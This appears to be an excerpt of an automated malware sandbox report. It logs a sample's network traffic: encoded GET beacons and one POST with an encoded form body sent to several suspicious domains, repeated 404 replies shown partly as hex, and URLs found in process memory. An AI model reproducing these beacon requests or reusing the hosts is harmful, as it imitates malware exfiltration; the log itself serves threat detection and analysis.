                Source: global trafficHTTP traffic detected: GET /2jc0/?bdi02je=02ITxlk7k5y73RXcEgyHf9eN5gBctaG4x5Z2Hm75JBt4EXaberRL5XNENm6Llqf4eDkRLvOACOcTLUte5cKTzLCIux+gwKEOB3rpq+QpBMz0/Iw+6w==&dZOh=OjIxv4 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Host: www.einpisalpace.shopConnection: closeUser-Agent: Mozilla/5.0 (iPad; CPU OS 8_3 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Mobile/12F69
Source: global traffic | HTTP traffic detected: GET /9tt6/?bdi02je=R3jpuUkZ7EJX4jqjTcmTvUqnmsYgEhE9uoYGKZnTkeq/io5yCJ6WA6X9pqF204rzk7Rku8NUjH1PNJ500I+1+upb+vrNHTsmBA3bSTQzlk0fY+b/7g==&dZOh=OjIxv4 HTTP/1.1 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 | Accept-Language: en-US,en;q=0.5 | Host: www.deacapalla.online | Connection: close | User-Agent: Mozilla/5.0 (iPad; CPU OS 8_3 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Mobile/12F69
Source: global traffic | HTTP traffic detected: GET /bhgd/?bdi02je=DwyTInzmM2N6MB8bA7Kl2rVP63jkNCBYgQInoYuWZdnLNHmEAu6R7FKnDf8o91RvtQ4ecsZhKZdUKJWxgxNcuNlYaUz0Gu0z3h0NSBZTW/WoATRTDg==&dZOh=OjIxv4 HTTP/1.1 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 | Accept-Language: en-US,en;q=0.5 | Host: www.unlimitu.website | Connection: close | User-Agent: Mozilla/5.0 (iPad; CPU OS 8_3 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Mobile/12F69
Source: global traffic | HTTP traffic detected: GET /58m5/?dZOh=OjIxv4&bdi02je=d1pgFl5Hp+GE0WFWsNtmNdDn5tG/BYSJ7zzhJcA1CBHzR3dh5eCk2y1Rogmf0tN3zZBB6GTJ43iUX+nETgktO5t+JdjWSzaOjXca9ruuKiduGBOEEQ== HTTP/1.1 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 | Accept-Language: en-US,en;q=0.5 | Host: www.dejikenkyu.cyou | Connection: close | User-Agent: Mozilla/5.0 (iPad; CPU OS 8_3 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Mobile/12F69
Source: global traffic | HTTP traffic detected: GET /lgqt/?dZOh=OjIxv4&bdi02je=MFLEYxMapfQGVvab2mlHik76Wq9wcc6WcK+9EDc9rbcpz4NQWkVXiWg1fs3lc2q3xV4dwTIV5BZ4nWHdDq3R5n+AFpmJ+Ly/L7LDS8t/ZQ+0r1kIoA== HTTP/1.1 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 | Accept-Language: en-US,en;q=0.5 | Host: www.031233226.xyz | Connection: close | User-Agent: Mozilla/5.0 (iPad; CPU OS 8_3 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Mobile/12F69
Source: global traffic | HTTP traffic detected: GET /nuxf/?bdi02je=6auJ0yMi6OdsOmW1PnEOwtKK+9KMlfd7htFlcJBIKY8nc6XduaXwfvOOo77xMmoGODzG8ol9XftCv+9phUBaDXIrAZJse5hp6wCZHpS5iNqkumbbXg==&dZOh=OjIxv4 HTTP/1.1 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 | Accept-Language: en-US,en;q=0.5 | Host: www.grimbo.boats | Connection: close | User-Agent: Mozilla/5.0 (iPad; CPU OS 8_3 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Mobile/12F69
Source: global traffic | HTTP traffic detected: GET /m1if/?dZOh=OjIxv4&bdi02je=hiCoNEWGLC+Yg+zH5qyDJS8Tq+9V0ljPyONuz3p+KqtlUJtklaaxXDftOiQ9jJfXeExikA9YAACl/ybcrnRwiKLR5knuCHWqVGESqivBmZbTiOmCPw== HTTP/1.1 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 | Accept-Language: en-US,en;q=0.5 | Host: www.autonomousoid.pro | Connection: close | User-Agent: Mozilla/5.0 (iPad; CPU OS 8_3 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Mobile/12F69
Source: global traffic | HTTP traffic detected: GET /74m3/?bdi02je=J07XWb6rRWuGJO5SkIECj5J69naqA0tAtwFpxaaB1F5KpFfZVTdv5vYkc6nIFzVKRu12SI0yHkyXUlDnhtlAoXgrV2iwEhrPt5IYDg3jm5H2VeGVpg==&dZOh=OjIxv4 HTTP/1.1 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 | Accept-Language: en-US,en;q=0.5 | Host: www.rpa.asia | Connection: close | User-Agent: Mozilla/5.0 (iPad; CPU OS 8_3 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Mobile/12F69
Source: unknown | HTTP traffic detected: POST /9tt6/ HTTP/1.1 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 | Accept-Language: en-US,en;q=0.5 | Accept-Encoding: gzip, deflate, br | Host: www.deacapalla.online | Connection: close | Cache-Control: no-cache | Content-Type: application/x-www-form-urlencoded | Content-Length: 196 | Origin: http://www.deacapalla.online | Referer: http://www.deacapalla.online/9tt6/ | User-Agent: Mozilla/5.0 (iPad; CPU OS 8_3 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Mobile/12F69 | Data Ascii: bdi02je=c1LJtjQDkzBszT3rXKPsw1qy8tAoWHYh9pYlAMaqmPiIrZU3Vt+BLtmCo49ioa79zu80rKtXoVppJrgqiLmJlr4+9JTKRh1PWC2HcBMvsVo1A5DW4kvGs1L3OAjf6lJ5l4q8N3DG+hLF8uix1YQBmKI9Qi6gQpZawCwZijnvtKgwmhvJVcx1fxnvvUo5
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Fri, 10 Jan 2025 22:05:40 GMT | Content-Type: text/html | Transfer-Encoding: chunked | Connection: close | Vary: Accept-Encoding | Last-Modified: Sun, 05 Jan 2025 21:39:02 GMT | cf-cache-status: DYNAMIC | Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zHYkuChScjLcDK5ZwtnlnP2Kf6lNJjPQ7dvVf1pIG9awHfbKteh0uzwzQfpDXwJ6zvz%2F9KWVyiCWZwQlyg63i6EeuJX8n3hXMNEJ2OKHe5L017ynYeY4KHs5YP1w1AsmCS10fx0BQhc%3D"}],"group":"cf-nel","max_age":604800} | NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} | Server: cloudflare | CF-RAY: 8ffff8443d1fc3ee-EWR | alt-svc: h3=":443"; ma=86400 | server-timing: cfL4;desc="?proto=TCP&rtt=1514&min_rtt=1514&rtt_var=757&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=486&delivery_rate=0&cwnd=245&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" | Data Ascii: 591<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head> <title>404 &mdash; Not Found</title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"/> <meta name="description" content="Sorry, page not found"/> <style type="text/css">
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Fri, 10 Jan 2025 22:06:10 GMT | Server: Apache | Content-Length: 389 | Connection: close | Content-Type: text/html | Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Fri, 10 Jan 2025 22:06:12 GMT | Server: Apache | Content-Length: 389 | Connection: close | Content-Type: text/html | Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Fri, 10 Jan 2025 22:06:15 GMT | Server: Apache | Content-Length: 389 | Connection: close | Content-Type: text/html | Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Fri, 10 Jan 2025 22:06:17 GMT | Server: Apache | Content-Length: 389 | Connection: close | Content-Type: text/html; charset=utf-8 | Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Fri, 10 Jan 2025 22:06:59 GMT | Server: Apache | Content-Length: 315 | Connection: close | Content-Type: text/html; charset=iso-8859-1 | Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Fri, 10 Jan 2025 22:07:02 GMT | Server: Apache | Content-Length: 315 | Connection: close | Content-Type: text/html; charset=iso-8859-1 | Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Fri, 10 Jan 2025 22:07:04 GMT | Server: Apache | Content-Length: 315 | Connection: close | Content-Type: text/html; charset=iso-8859-1 | Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Fri, 10 Jan 2025 22:07:07 GMT | Server: Apache | Content-Length: 315 | Connection: close | Content-Type: text/html; charset=iso-8859-1 | Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Fri, 10 Jan 2025 22:07:13 GMT | Content-Type: text/html; charset=iso-8859-1 | Transfer-Encoding: chunked | Connection: close | cf-cache-status: DYNAMIC | vary: accept-encoding | Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=aRv5Eiw%2BuA0NsdnI0lIpjaA4pRK%2BSM%2Bgbr7k8NEJRGzr31dI97GzwQSjUaqtU2VdhkLa92octjvd%2BdeSjDlUhhH1N9b2AlMMvipzpUxQN4q%2FWPjc7iTOFBQIIXxE4tTlNmwl"}],"group":"cf-nel","max_age":604800} | NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} | Server: cloudflare | CF-RAY: 8ffffa88f83c4322-EWR | Content-Encoding: gzip | alt-svc: h3=":443"; ma=86400 | server-timing: cfL4;desc="?proto=TCP&rtt=1792&min_rtt=1792&rtt_var=896&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=745&delivery_rate=0&cwnd=219&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" | Data Raw: (gzip-compressed chunked body, not reproduced)
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Fri, 10 Jan 2025 22:07:15 GMT | Content-Type: text/html; charset=iso-8859-1 | Transfer-Encoding: chunked | Connection: close | cf-cache-status: DYNAMIC | vary: accept-encoding | Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7sZYhGPN8UfK2XzMA%2BQ6xQQz5X%2FdEXNUPDfT50NHIptrBJ6bLMAJw5A4Y1wPyiu1juL6CO%2BPtXPCfRoJZZ4o3C4157raVJDUc5pZ7ZtTUDRpIWCiHD71HUC1v6XldruDWqux"}],"group":"cf-nel","max_age":604800} | NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} | Server: cloudflare | CF-RAY: 8ffffa98fac080d3-EWR | Content-Encoding: gzip | alt-svc: h3=":443"; ma=86400 | server-timing: cfL4;desc="?proto=TCP&rtt=1472&min_rtt=1472&rtt_var=736&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=769&delivery_rate=0&cwnd=230&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" | Data Raw: (gzip-compressed chunked body, not reproduced)
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Fri, 10 Jan 2025 22:07:18 GMT | Content-Type: text/html; charset=iso-8859-1 | Transfer-Encoding: chunked | Connection: close | cf-cache-status: DYNAMIC | vary: accept-encoding | Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=h1LSCZap%2FjfVFRruKFfIcsziXKxf8KQLeO3oq8aVtRLmrjYpXDytdI7L4CtK5SJSXcJKHoRGpRhYPishLadCFnzA4PVTOKxluGC9vOlp4RdrwBwVijC5EGT1eOSS7D7M%2B2su"}],"group":"cf-nel","max_age":604800} | NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} | Server: cloudflare | CF-RAY: 8ffffaa8dde9435d-EWR | Content-Encoding: gzip | alt-svc: h3=":443"; ma=86400 | server-timing: cfL4;desc="?proto=TCP&rtt=1615&min_rtt=1615&rtt_var=807&sent=1&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1782&delivery_rate=0&cwnd=126&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" | Data Raw: (gzip-compressed chunked body, not reproduced)
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Fri, 10 Jan 2025 22:07:20 GMT | Content-Type: text/html; charset=iso-8859-1 | Transfer-Encoding: chunked | Connection: close | cf-cache-status: DYNAMIC | vary: accept-encoding | Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=w0MsLdmLG8BZIyoU6j1qYC4H4H3iGusq%2F58Lh1WJVIyKQauJ9tyfOBHs8gcEADZwY5B%2FJJhT71X4BT05V68wfeP9CEhaEkts6mpwCLJ%2BlhP813Vf3eLMeFMeQrAc0eWMth1t"}],"group":"cf-nel","max_age":604800} | NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} | Server: cloudflare | CF-RAY: 8ffffab8e9b742f4-EWR | alt-svc: h3=":443"; ma=86400 | server-timing: cfL4;desc="?proto=TCP&rtt=1605&min_rtt=1605&rtt_var=802&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=481&delivery_rate=0&cwnd=231&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" | Data Ascii: 116<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.52 (Ubuntu) Server at www.grimbo.boats Port 80</address></body></html>0
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Connection: close | cache-control: private, no-cache, no-store, must-revalidate, max-age=0 | pragma: no-cache | content-type: text/html | content-length: 1251 | date: Fri, 10 Jan 2025 22:07:40 GMT | server: LiteSpeed | Data Raw: (truncated hex body, not reproduced)
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Connection: close | cache-control: private, no-cache, no-store, must-revalidate, max-age=0 | pragma: no-cache | content-type: text/html | content-length: 1251 | date: Fri, 10 Jan 2025 22:07:42 GMT | server: LiteSpeed | Data Raw: (truncated hex body, not reproduced)
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Connection: close | cache-control: private, no-cache, no-store, must-revalidate, max-age=0 | pragma: no-cache | content-type: text/html | content-length: 1251 | date: Fri, 10 Jan 2025 22:07:45 GMT | server: LiteSpeed | Data Raw: (truncated hex body, not reproduced)
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Fri, 10 Jan 2025 22:07:47 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 
61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 31 30 31
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 10 Jan 2025 22:07:53 GMTServer: ApacheStrict-Transport-Security: max-age=63072000; includeSubDomainsX-Frame-Options: SAMEORIGINX-Content-Type-Options: nosniffContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 10 Jan 2025 22:07:56 GMTServer: ApacheStrict-Transport-Security: max-age=63072000; includeSubDomainsX-Frame-Options: SAMEORIGINX-Content-Type-Options: nosniffContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 10 Jan 2025 22:07:59 GMTServer: ApacheStrict-Transport-Security: max-age=63072000; includeSubDomainsX-Frame-Options: SAMEORIGINX-Content-Type-Options: nosniffContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: ROUTE.EXE, 00000007.00000002.3231147711.0000000005EF0000.00000004.00000800.00020000.00000000.sdmp, ROUTE.EXE, 00000007.00000002.3229283746.0000000003D86000.00000004.10000000.00040000.00000000.sdmp, YLmLMhEKNXTfg.exe, 00000008.00000002.3228307106.0000000003276000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://digi-searches.com/px.js?ch=1
                Source: ROUTE.EXE, 00000007.00000002.3231147711.0000000005EF0000.00000004.00000800.00020000.00000000.sdmp, ROUTE.EXE, 00000007.00000002.3229283746.0000000003D86000.00000004.10000000.00040000.00000000.sdmp, YLmLMhEKNXTfg.exe, 00000008.00000002.3228307106.0000000003276000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://digi-searches.com/px.js?ch=2
